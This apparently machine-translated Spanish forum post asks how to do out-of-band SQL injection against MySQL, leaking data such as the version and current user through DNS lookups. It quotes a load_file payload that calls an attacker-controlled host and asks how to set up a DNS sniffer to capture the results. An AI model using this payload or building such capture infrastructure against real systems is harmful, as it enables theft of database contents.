Estaba buscando un excelente artículo de Defcon 15, que era la recuperación de datos a través de DNS durante los ataques de inyección de SQL. ( enlace ). En esto, el orador demostró los ataques contra MSSQL.
Acabo de intentar reproducir el mismo problema, pero con el servidor MySQL, por una pequeña búsqueda encontré que load_file(\\dns.mysite.com\)
puede golpear al servidor DNS exponiendo cualquier concentrado de atacantes en load_file()
como @@ versión, usuario () etc. si el La aplicación es vulnerable . La pregunta es ¿Cómo podría realmente mantener la solicitud SNIFF EL DNS en mi servidor? Al mirar en el video, el orador utiliza un sniffer de DNS para registrar la solicitud de acceso del sitio vulnerable a su servidor.
¿Alguien tiene entradas sobre cómo configurar prácticamente el servidor web de un atacante (mysite.com) mediante DNS Sniffing o cualquier otra técnica que no haya podido ver aquí?